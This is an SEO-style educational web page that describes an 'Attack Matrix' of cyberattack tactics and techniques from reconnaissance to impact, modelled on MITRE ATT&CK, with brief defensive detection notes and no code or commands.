The Attack Matrix is a structured framework that maps the complete lifecycle of a cyberattack—from initial reconnaissance to final impact—helping organizations understand how adversaries operate across different stages. By breaking down attacker behavior into phases such as persistence, privilege escalation, lateral movement, and exfiltration, the Attack Matrix provides a clear, actionable view of how threats evolve inside an environment. This approach enables security teams to align detection, prevention, and response strategies with real-world attack patterns, improving visibility across the entire kill chain and strengthening overall cybersecurity posture.
Reconnaissance to Execution
Persistence to Credential Access
Discovery to Command and Control
Exfiltration and Impact
Attack Matrix: Reconnaissance to Execution
What is the Attack Matrix?
The Attack Matrix represents the lifecycle of a cyberattack—from early-stage intelligence gathering (Reconnaissance) to actual payload execution (Execution). It maps attacker behavior into structured phases, helping defenders understand how threats evolve and where to detect or stop them.
This model aligns conceptually with frameworks like the MITRE ATT&CK framework, where each phase contains multiple techniques adversaries use to compromise systems.
Reconnaissance
Overview
Reconnaissance is the initial phase of an attack, where adversaries collect information about targets such as infrastructure, users, and technologies. This phase is often passive but can also involve active probing. The goal is to identify attack surfaces, weak points, and potential entry vectors.
Techniques
Active Scanning (3)
Attackers actively probe networks, systems, or applications to identify open ports, services, and vulnerabilities.
This includes scanning tools that send packets to detect live hosts and exposed services.
It can trigger alerts in IDS/IPS systems due to abnormal traffic patterns.
Frequent scanning from unknown IPs is often an early indicator of reconnaissance.
Gather Victim Host Information (4)
This involves collecting data about specific systems, including OS versions, installed software, and configurations.
Attackers may use fingerprinting techniques to identify exploitable environments.
The information helps tailor attacks like exploits or malware delivery.
Even minor misconfigurations discovered here can be leveraged later.
Gather Victim Identity Information (3)
Adversaries collect user-related data such as email addresses, usernames, and roles.
This information is often sourced from social media, leaked databases, or corporate directories.
It enables targeted attacks like spear phishing or credential stuffing.
Identity intelligence increases the success rate of social engineering campaigns.
Gather Victim Organization Information (4)
Attackers study organizational structure, business operations, and technologies used.
Public sources like websites, job postings, and press releases are commonly used.
This helps identify critical systems and high-value targets.
Understanding the organization improves attack planning and evasion strategies.
Phishing for Information (3)
This technique involves tricking users into revealing sensitive data such as credentials or internal details.
Emails, fake login pages, or social engineering tactics are used.
It is often used early to validate targets or gain initial insights.
Successful phishing can directly lead to initial access.
Search Open Technical Databases (5)
Attackers leverage publicly available databases like CVE listings, GitHub, or Shodan.
They look for exposed assets, known vulnerabilities, or misconfigured services.
This is a low-noise method that avoids detection.
It enables attackers to map attack surfaces without interacting directly with targets.
Resource Development
Overview
In this phase, attackers prepare the infrastructure and capabilities required for an attack. This includes acquiring domains, building malware, and compromising accounts. It bridges reconnaissance and exploitation.
Techniques
Acquire Access
Attackers obtain credentials or access tokens through leaks, purchases, or prior compromises.
This may include stolen VPN credentials or cloud access keys.
Access acquisition reduces the need for exploitation later.
It enables stealthy entry into environments.
Acquire Infrastructure (8)
Adversaries set up servers, domains, or cloud resources for hosting malware or command-and-control (C2).
Infrastructure can include VPS servers or compromised websites.
It supports phishing campaigns, payload delivery, and data exfiltration.
Well-prepared infrastructure improves attack resilience.
Compromise Accounts (3)
Existing accounts are taken over using credential theft, brute force, or credential stuffing.
These accounts may belong to employees, admins, or service accounts.
Compromised accounts provide legitimate access paths.
This technique is commonly used in cloud and SaaS attacks.
Compromise Infrastructure (6)
Attackers take control of legitimate infrastructure such as websites or servers.
This infrastructure can then be used to host malicious content or redirect traffic.
It helps bypass security controls due to trusted domains.
This is often seen in supply chain or watering hole attacks.
Develop Capabilities (4)
Adversaries create or customize tools, malware, or exploit kits.
This includes obfuscation techniques to evade detection.
Capabilities are often tailored to target environments.
Custom tooling increases stealth and effectiveness.
Establish Accounts (5)
Attackers create new accounts within systems, often with persistence in mind.
These may include cloud users or application-level accounts.
They are used to maintain long-term access.
Detection can be difficult if accounts appear legitimate.
Initial Access
Overview
Initial Access is where attackers first gain entry into the target environment. This phase is critical, as it determines whether the attack progresses further.
Techniques
Content Injection
Attackers insert malicious code into legitimate websites or applications.
This can affect users visiting compromised pages.
It is often used in web-based attacks like XSS or supply chain compromises.
Users interacting with infected content may unknowingly execute payloads.
Drive-by Compromise
Users are infected simply by visiting a compromised or malicious website.
No explicit action is required beyond browsing.
Exploits target browser or plugin vulnerabilities.
This technique is commonly used in mass exploitation campaigns.
Exploit Public-Facing Application
Attackers exploit vulnerabilities in internet-facing applications such as web servers.
Common examples include SQL injection or RCE vulnerabilities.
Successful exploitation can provide direct system access.
Unpatched applications are a major risk factor.
External Remote Services
Adversaries gain access through exposed services like VPN, RDP, or SSH.
This often involves stolen credentials or weak authentication.
It is a common entry vector in ransomware attacks.
Monitoring login anomalies is key for detection.
Hardware Additions
Physical devices such as rogue USBs or network implants are introduced.
These devices can execute malware or intercept traffic.
It requires physical access or insider involvement.
Though less common, it can bypass traditional defenses.
Replication Through Removable Media
Malware spreads via USB drives or external storage devices.
This technique is often used in air-gapped environments.
It enables propagation without network connectivity.
Detection relies on endpoint monitoring and device control policies.
Execution
Overview
Execution is the phase where malicious code is run within the victim environment. This is where attackers begin actively controlling systems, deploying malware, or executing commands.
Techniques
Cloud Administration
Attackers use cloud management interfaces or APIs to execute actions.
This includes creating resources, modifying configurations, or exfiltrating data.
It often leverages compromised cloud credentials.
Cloud-native visibility is critical for detection.
Command & Script Interpreter (13)
Attackers execute commands using tools like PowerShell, Bash, or CMD.
These interpreters are legitimate tools abused for malicious purposes.
This technique supports fileless attacks and lateral movement.
Monitoring unusual command execution is essential.
Container Administration
Adversaries interact with container environments such as Docker or Kubernetes.
They may deploy or modify containers to run malicious workloads.
Container misconfigurations are often exploited.
Visibility into container activity is crucial.
Deploy Container
Attackers deploy new containers containing malicious payloads.
These containers can be used for persistence or cryptomining.
They blend into normal cloud-native operations.
Security controls must include container runtime monitoring.
Inter-Process Communication (3)
Malicious processes communicate with other processes to execute tasks.
This includes techniques like DLL injection or process hollowing.
It allows attackers to hide within legitimate processes.
Behavioral detection is key to identifying such activity.
Native API
Attackers use operating system APIs directly to perform malicious actions.
This avoids higher-level detection mechanisms.
It is often used in advanced malware.
Low-level monitoring is required to detect such behavior.
Key Takeaways
- The attack matrix provides a structured view of attacker behavior across stages
- Early phases like Reconnaissance and Resource Development are often invisible
- Initial Access and Execution are critical detection points
- Mapping techniques to detection controls improves SOC visibility and response
Here is the SEO-optimized, structured continuation of your Attack Matrix page covering:
Persistence to Credential Access
What This Phase Covers
After gaining initial access and executing code, attackers aim to maintain control, escalate privileges, evade detection, and ultimately steal credentials.
This phase is critical because it determines:
- How long attackers remain undetected
- Whether they gain administrative control
- How they move deeper into the environment
It includes four major tactics:
- Persistence – Maintaining long-term access
- Privilege Escalation – Gaining higher-level permissions
- Defense Evasion – Avoiding detection mechanisms
- Credential Access – Stealing authentication data
Understanding this stage helps defenders disrupt attacks before lateral movement or data exfiltration occurs, aligning with structured threat modeling practices .
Persistence
Overview
Persistence techniques allow attackers to retain access across reboots, logouts, or credential resets. These techniques ensure that even if initial entry points are closed, attackers can re-enter the system.
Techniques
Account Manipulation (7)
Attackers modify existing accounts to maintain access, such as adding privileges or altering credentials.
This can include changing group memberships or disabling security controls.
It enables long-term persistence using legitimate identities.
Such changes often blend into normal administrative activity.
BITS Jobs
Background Intelligent Transfer Service (BITS) is abused to download or execute malicious payloads.
BITS jobs can persist across reboots and run in the background.
This technique is stealthy because it uses a trusted Windows service.
Detection requires monitoring unusual BITS job creation.
Boot/Logon Autostart (14)
Malicious programs are configured to run automatically at system startup or user logon.
This includes registry run keys, startup folders, or scheduled tasks.
It ensures payload execution without user interaction.
Widely used by malware for persistence.
Browser Extensions (3)
Attackers install malicious browser extensions to maintain access and monitor activity.
Extensions can capture data, inject scripts, or redirect traffic.
They persist within the browser environment.
Often overlooked in traditional endpoint security monitoring.
Create Account (3)
New user accounts are created to maintain unauthorized access.
These accounts may appear legitimate or mimic existing users.
They provide fallback access if other methods are removed.
Monitoring unauthorized account creation is critical.
Create or Modify System Process (4)
Attackers alter system processes or create new ones to maintain persistence.
This may involve injecting code into trusted processes.
It helps evade detection by blending with normal operations.
Behavioral analysis is required for detection.
Privilege Escalation
Overview
Privilege escalation techniques allow attackers to gain higher-level permissions, such as administrator or root access. This enables deeper control over systems and access to sensitive resources.
Techniques
Abuse Elevation Control (6)
Attackers exploit mechanisms like UAC (User Account Control) to elevate privileges.
This may involve bypassing prompts or exploiting misconfigurations.
It allows execution of high-privilege actions.
Often used immediately after initial access.
Access Token Manipulation (5)
Attackers manipulate access tokens to impersonate other users or processes.
This enables privilege escalation without needing credentials.
It is commonly used in Windows environments.
Detection involves monitoring token usage anomalies.
Account Manipulation (7)
Existing accounts are modified to grant elevated privileges.
This may include adding users to admin groups.
It provides persistent elevated access.
Changes can be subtle and hard to detect.
Boot or Logon Autostart (14)
Autostart mechanisms are leveraged to execute code with higher privileges.
Misconfigured services or tasks may run with elevated rights.
Attackers exploit these to gain privilege escalation.
Requires auditing of startup configurations.
Create or Modify System Process (4)
Attackers create or hijack processes running with elevated privileges.
This enables execution of privileged operations.
Often involves process injection techniques.
Monitoring parent-child process relationships helps detect it.
Domain Policy Modification (2)
Attackers modify domain-level policies to escalate privileges across systems.
This can impact multiple users and machines.
It provides widespread control in enterprise environments.
Highly critical and requires strict monitoring.
Defense Evasion
Overview
Defense evasion techniques are used to avoid detection by security tools such as antivirus, EDR, SIEM, and IDS systems. These techniques help attackers remain hidden while continuing operations.
Techniques
Abuse Elevation Control (6)
Attackers exploit privilege mechanisms to bypass security restrictions.
This may disable or circumvent security prompts.
It allows malicious actions to proceed undetected.
Often overlaps with privilege escalation.
Access Token Manipulation (5)
Token manipulation is used to bypass security controls and impersonate trusted entities.
It helps evade detection by appearing legitimate.
Attackers can execute actions under trusted contexts.
Detection requires identity and behavior monitoring.
BITS Jobs
BITS is used to transfer malicious payloads stealthily.
Because it is a legitimate service, it avoids suspicion.
It enables covert data transfer and execution.
Monitoring unusual BITS activity is key.
Build Image on Host
Attackers create or modify system images locally to evade detection.
This may include staging payloads within legitimate images.
It helps bypass traditional file-based detection.
Often used in advanced persistent threats (APTs).
Debugger Evasion
Malware detects debugging or analysis environments and alters behavior.
This prevents security researchers from analyzing it.
It helps avoid detection by sandbox environments.
Common in sophisticated malware families.
Deception Operation
Attackers use fake artifacts or misleading activity to confuse defenders.
This includes generating noise or false indicators.
It delays detection and response efforts.
Often used in advanced campaigns.
Credential Access
Overview
Credential access techniques focus on stealing authentication data, enabling attackers to move laterally and escalate privileges further. This is a key objective in most cyberattacks.
Techniques
Adversary-in-the-Middle (4)
Attackers intercept communications between users and systems.
This allows capture of credentials during authentication.
Often involves proxying or session hijacking techniques.
Common in phishing and network attacks.
Brute Force (4)
Attackers attempt multiple password combinations to gain access.
This can target login portals, APIs, or services.
Weak passwords significantly increase risk.
Detection involves monitoring login failures and anomalies.
Credentials from Password Stores (6)
Stored credentials are extracted from browsers, OS vaults, or applications.
This includes password managers or cached credentials.
Attackers gain access without user interaction.
Endpoint monitoring is critical for detection.
Forge Credentials (2)
Attackers create fake authentication tokens or tickets.
This allows access without valid credentials.
Common in advanced attacks targeting identity systems.
Detection requires strong identity validation controls.
Input Capture (4)
User input such as keystrokes is captured using keyloggers.
This includes credentials entered into login forms.
It can occur at the OS or application level.
Often difficult to detect without behavioral monitoring.
Modify Authentication Process (9)
Attackers alter authentication mechanisms to capture or bypass credentials.
This may involve tampering with login processes or libraries.
It enables persistent credential theft.
Highly advanced and critical to detect early.
Key Takeaways
- Persistence ensures attackers remain inside environments long-term
- Privilege escalation enables full system or domain control
- Defense evasion allows attackers to operate undetected
- Credential access is the gateway to lateral movement and data compromise
Attack Matrix: Discovery to Command and Control
What This Phase Covers
Once attackers establish persistence and gain access to credentials, they move into internal exploration and operational control. This phase includes:
- Discovery – Understanding the environment
- Lateral Movement – Expanding access across systems
- Collection – Gathering sensitive data
- Command and Control (C2) – Maintaining communication with attacker infrastructure
This stage is critical because it transforms an initial breach into a full-scale compromise, enabling data theft, surveillance, or disruption.
Discovery
Overview
Discovery techniques are used by attackers to map the internal environment, identify valuable assets, and understand how systems and users interact. This phase helps attackers plan lateral movement and data collection.
Techniques
Account Discovery (4)
Attackers enumerate user accounts, groups, and roles within a system or domain.
This helps identify privileged accounts and potential targets.
It often involves querying directories like Active Directory.
Detection includes monitoring unusual account enumeration activity.
Application Window Discovery
Attackers identify open application windows on a system.
This helps determine what software is actively being used.
It can reveal sensitive applications like finance or admin tools.
Often used in targeted attacks to prioritize actions.
Browser Information Discovery
Information such as browsing history, bookmarks, and stored data is collected.
This reveals user behavior and accessed services.
It can expose login portals or sensitive web applications.
Often overlaps with credential harvesting efforts.
Cloud Infrastructure Discovery
Attackers enumerate cloud resources such as VMs, storage, and networks.
This is common in AWS, Azure, and GCP environments.
It helps identify exposed services and misconfigurations.
Cloud logging and API monitoring are key for detection.
Cloud Service Dashboard
Attackers access cloud dashboards to view configurations and resources.
This provides a centralized view of the environment.
It can expose sensitive data and administrative controls.
Often achieved using stolen cloud credentials.
Cloud Service Discovery
Attackers identify cloud services in use, such as SaaS applications.
This includes email platforms, storage services, and APIs.
It helps expand attack surface understanding.
Critical for targeting cloud-native environments.
Lateral Movement
Overview
Lateral movement allows attackers to move from one system to another, expanding their foothold. This phase is essential for reaching high-value systems and achieving broader compromise.
Techniques
Exploitation of Remote Services
Attackers exploit vulnerabilities in internal services to move laterally.
This includes exploiting SMB, RDP, or RPC services.
It allows direct access to additional systems.
Unpatched services increase risk significantly.
Internal Spearphishing
Targeted phishing attacks are launched within the organization.
Compromised accounts are often used to send convincing messages.
This helps gain access to additional users.
Detection involves monitoring abnormal email behavior.
Lateral Tool Transfer
Attackers transfer tools or malware between systems.
This enables execution of payloads on new targets.
It often uses file shares or administrative tools.
Monitoring file movement between hosts is essential.
Remote Service Session Hijacking
Active sessions are hijacked to gain access without credentials.
This includes stealing or reusing session tokens.
It allows attackers to impersonate legitimate users.
Session monitoring is critical for detection.
Remote Services (8)
Attackers use legitimate remote services like RDP or SSH to move laterally.
This often involves stolen credentials.
It blends with normal administrative activity.
Login anomaly detection is key.
Software Deployment Tools
Enterprise tools like SCCM are abused to deploy malware.
These tools are trusted and widely used in organizations.
Attackers leverage them for large-scale propagation.
Monitoring misuse of deployment tools is essential.
Collection
Overview
Collection involves gathering sensitive data and information that attackers aim to exfiltrate. This includes credentials, documents, communications, and system data.
Techniques
Adversary-in-the-Middle (4)
Attackers intercept internal communications to capture data.
This includes credentials and sensitive information.
Often involves proxying or network interception.
Common in advanced targeted attacks.
Archive Collected Data (3)
Data is compressed or archived before exfiltration.
This reduces size and helps evade detection.
Common formats include ZIP or RAR files.
Monitoring large archive creation is important.
Audio Capture
Attackers record audio from microphones on compromised devices.
This can capture sensitive conversations.
It is often used in espionage scenarios.
Requires endpoint monitoring to detect.
Automated Collection
Scripts or tools automatically gather data from systems.
This includes files, logs, or database content.
It increases efficiency and speed of data collection.
Detection involves identifying abnormal automation behavior.
Browser Information Discovery
Browser data such as cookies and sessions is collected.
This can include authentication tokens.
It enables account hijacking or session reuse.
Often overlaps with credential access techniques.
Clipboard Data
Attackers monitor clipboard contents for sensitive information.
This may include passwords or copied data.
It is a low-noise data collection method.
Detection is difficult without endpoint visibility.
Command and Control (C2)
Overview
Command and Control enables attackers to communicate with compromised systems, issue commands, and receive data. This phase is essential for maintaining control over infected environments.
Techniques
Application Layer Protocol (5)
Attackers use protocols like HTTP, HTTPS, or DNS for communication.
This blends malicious traffic with normal network activity.
It helps bypass network security controls.
Traffic analysis is required for detection.
Communication Through Removable Media
Data and commands are transferred using removable media like USB drives.
This is useful in air-gapped environments.
It avoids network-based detection mechanisms.
Device control policies can mitigate this risk.
Data Encoding (2)
Data is encoded to evade detection during transmission.
This may include Base64 or custom encoding schemes.
It helps hide malicious content in normal traffic.
Decoding and inspection are required for analysis.
Data Obfuscation (2)
Attackers obfuscate data to conceal its true nature.
This includes encryption or transformation techniques.
It complicates detection and analysis.
Security tools must detect patterns, not just signatures.
Dynamic Resolution (3)
Attackers use techniques like DNS-based resolution to change endpoints.
This includes fast-flux or domain rotation.
It makes blocking infrastructure more difficult.
DNS monitoring is essential.
Encrypted Channel (2)
Encrypted channels such as HTTPS or VPNs are used for C2 communication.
This protects attacker communications from inspection.
It blends with legitimate encrypted traffic.
Decryption and behavioral analysis are needed for detection.
Attack Matrix: Exfiltration and Impact
What This Phase Covers
The final stage of a cyberattack focuses on extracting valuable data (Exfiltration) and executing the attacker’s ultimate objective (Impact).
At this point, attackers have:
- Established persistence
- Escalated privileges
- Moved laterally
- Collected sensitive data
Now, they either steal data for financial/espionage purposes or disrupt systems to cause damage.
This phase represents the highest business risk, often leading to:
- Data breaches
- Ransomware incidents
- Operational downtime
- Regulatory and financial consequences
Exfiltration
Overview
Exfiltration techniques are used to transfer stolen data out of the victim environment. Attackers aim to move data stealthily while avoiding detection by security controls.
Techniques
Automated Exfiltration (1)
Attackers use scripts or tools to automatically transfer data at scale.
This reduces manual effort and speeds up data theft.
Automation can occur continuously or at scheduled intervals.
Detection requires monitoring abnormal outbound traffic patterns.
Data Transfer Size Limits
Attackers intentionally limit the size of data transfers to avoid detection.
Small, incremental transfers blend with normal network activity.
This technique helps bypass data loss prevention (DLP) systems.
Long-term monitoring is needed to identify patterns.
Exfiltration Over Alternative Protocol (3)
Data is exfiltrated using uncommon or less-monitored protocols.
Examples include DNS tunneling or ICMP-based transfer.
These protocols often bypass traditional security controls.
Detection requires protocol-aware traffic analysis.
Exfiltration Over C2 Channel
Stolen data is sent through established command-and-control channels.
This blends exfiltration with normal attacker communication.
Encrypted C2 channels make detection more difficult.
Monitoring C2 traffic is critical to identifying data leaks.
Exfiltration Over Other Network Medium (2)
Attackers use different network paths or mediums to transfer data.
This may include secondary network interfaces or covert channels.
It helps bypass network segmentation controls.
Detection involves monitoring unusual network routes.
Exfiltration Over Physical Medium
Data is exfiltrated using physical devices like USB drives or external disks.
This is common in air-gapped or highly secure environments.
It bypasses network-based defenses entirely.
Strict device control policies are essential for mitigation.
Impact
Overview
Impact techniques represent the final objective of the attacker, where they disrupt systems, destroy data, or demand ransom. This phase often causes the most visible and damaging consequences.
Techniques
Account Access Removal
Attackers lock out legitimate users by changing credentials or disabling accounts.
This prevents recovery and response efforts.
It is often used during ransomware attacks.
Monitoring sudden access changes is critical.
Data Destruction (1)
Sensitive data is permanently deleted or corrupted.
This may target backups, logs, or production systems.
It results in irreversible data loss.
Strong backup strategies are essential for recovery.
Data Encrypted for Impact (3)
Attackers encrypt data to make it inaccessible, typically in ransomware attacks.
Victims are forced to pay for decryption keys.
This disrupts business operations significantly.
Detection and early response are crucial.
Data Manipulation (3)
Data is altered to compromise integrity and trust.
This may include financial records or system configurations.
It can lead to incorrect decisions and operational issues.
Integrity monitoring is required to detect changes.
Defacement (2)
Websites or applications are altered to display unauthorized content.
This damages brand reputation and public trust.
Often used for political or hacktivist motives.
Web application monitoring can help detect defacement.
Disk Wipe (2)
Attackers erase entire disks or systems to render them unusable.
This causes severe operational disruption.
It is often used in destructive attacks or as a distraction.
Recovery depends on backups and incident response readiness
Final Key Takeaways: Full Attack Lifecycle
- Exfiltration focuses on stealthy data theft using multiple channels
- Impact delivers the attacker’s end goal: disruption, destruction, or ransom
- Early detection in previous stages can prevent catastrophic outcomes
- Strong controls across all phases are essential for complete defense coverage
Why the Attack Matrix Matters in Cybersecurity
The Attack Matrix is essential for understanding how modern cyberattacks unfold across multiple stages. By using the Attack Matrix, security teams can map attacker behavior, identify gaps in detection, and improve response strategies.
The Attack Matrix helps organizations:
- Visualize attacker movement across systems
- Align defenses with real-world attack techniques
- Improve threat hunting and incident response
Without the Attack Matrix, it becomes difficult to correlate isolated security events into a complete attack chain. This makes the Attack Matrix a foundational model for modern cybersecurity operations.
How to Use the Attack Matrix for Defense
Organizations can use the Attack Matrix to strengthen their security posture by aligning detection tools and controls with each stage.
Using the Attack Matrix allows teams to:
- Detect early reconnaissance signals
- Stop lateral movement before escalation
- Prevent data exfiltration and impact
Security teams that operationalize the Attack Matrix gain better visibility and faster response times across the entire attack lifecycle.
Attack Matrix in Modern Threat Intelligence
The Attack Matrix plays a critical role in modern threat intelligence by providing a structured way to analyze attacker behavior. Security teams rely on the Attack Matrix to correlate events, detect anomalies, and prioritize risks. By integrating the Attack Matrix into SIEM and EDR platforms, organizations can improve detection accuracy and reduce response times. The Attack Matrix also supports compliance, risk management, and proactive threat hunting strategies.